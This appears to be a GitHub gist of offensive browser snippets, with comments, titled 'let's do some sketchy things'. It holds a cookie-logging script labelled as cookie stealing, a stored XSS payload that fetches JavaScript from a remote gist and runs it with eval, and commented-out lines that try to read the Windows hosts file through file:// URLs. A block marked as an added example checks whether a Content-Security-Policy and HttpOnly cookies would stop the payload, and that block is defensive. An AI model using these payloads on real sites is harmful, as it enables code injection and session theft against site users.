@lostsh
Last active May 31, 2022 12:29
let's do some sketchy things
```javascript
const interval = setTimeout(redirect, 5000);

function stopTimout() {
  clearTimeout(interval);
}

function redirect() {
  stopTimout();
  console.log("Redirect");
  console.log(document.cookie);
}
```

lostsh commented May 31, 2022

cookie stealing (needs update)

some save:

```javascript
function logCookies(cookies) {
  for (let cookie of cookies) {
    console.log(cookie.value);
  }
}

let gettingAll = browser.cookies.getAll({
  name: "favorite-color"
});
gettingAll.then(logCookies);
```


lostsh commented May 31, 2022

Payload stored in the site

```html
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="function pwn(){fetch('https://gist.githubusercontent.com/lostsh/1a963d8593623ee5a18df37e5933bbef/raw/').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();"></xss>
```
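
The stored payload above needs three things a Content-Security-Policy can each deny: an inline event handler, a fetch to gist.githubusercontent.com, and eval; the fetched script then reads document.cookie, which never contains HttpOnly cookies. The following is an added example, not part of the gist: it checks a policy and a set of Set-Cookie headers against those stages, using constructed sample headers and a simplified model of CSP matching.

```javascript
// Added example: simplified CSP model ('unsafe-hashes' and path matching are not modeled).
const PAYLOAD_HOST = "gist.githubusercontent.com"; // host the payload on this page fetches from
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !policy.has(name)) policy.set(name, sources); // first duplicate wins
  }
  return policy;
}

// Source list of the first directive in the fallback chain that the policy defines, or null.
const effective = (policy, chain) => policy.get(chain.find((d) => policy.has(d))) ?? null;
function hostAllowed(sources, host) {
  return sources.some((s) => {
    if (s === "*" || s === "https:" || s === "http:") return true;
    const h = s.replace(/^https?:\/\//, "").replace(/[:\/].*$/, ""); // keywords like 'self' never equal a host
    return h.startsWith("*.") ? host.endsWith(h.slice(1)) : h === host;
  });
}

function inlineHandlerAllowed(policy) {
  const s = effective(policy, ["script-src-attr", "script-src", "default-src"]);
  if (s === null) return true; // no governing directive
  // A nonce, hash or 'strict-dynamic' makes browsers ignore 'unsafe-inline'.
  const overridden = s.some((x) => /^'(nonce-|sha(256|384|512)-|strict-dynamic')/.test(x));
  return s.includes("'unsafe-inline'") && !overridden;
}

function assessPayload(cspHeader) {
  const policy = parseCsp(cspHeader);
  const connect = effective(policy, ["connect-src", "default-src"]);
  const script = effective(policy, ["script-src", "default-src"]);
  const handlerRuns = inlineHandlerAllowed(policy);
  const fetchAllowed = connect === null || hostAllowed(connect, PAYLOAD_HOST);
  const evalAllowed = script === null || script.includes("'unsafe-eval'");
  return { handlerRuns, fetchAllowed, evalAllowed, blocked: !(handlerRuns && fetchAllowed && evalAllowed) };
}

// Names of cookies that document.cookie would expose (no HttpOnly attribute).
function scriptReadableCookies(setCookieHeaders) {
  const httpOnly = /;\s*httponly\s*(;|$)/i;
  return setCookieHeaders.filter((h) => !httpOnly.test(h)).map((h) => h.split("=")[0].trim());
}

// Constructed sample headers, not taken from any real site.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src *";
const STRICT_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";
const SAMPLE_COOKIES = ["session=abc123; Path=/; Secure; HttpOnly", "favorite-color=blue; Path=/"];
console.log(assessPayload(WEAK_CSP), assessPayload(STRICT_CSP), scriptReadableCookies(SAMPLE_COOKIES));
```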


lostsh commented May 31, 2022

```javascript
//location.href = "file:///C:/Windows/System32";
//window.open("file:///c:/windows/system32/drivers/etc/hosts");
//document.body.innerHTML = "<iframe src="file://localhost/c:/windows/system32/drivers/etc/hosts" onload="alert(iframe.contentDocument.body.innerHTML)" id="iframe"></iframe>";
```
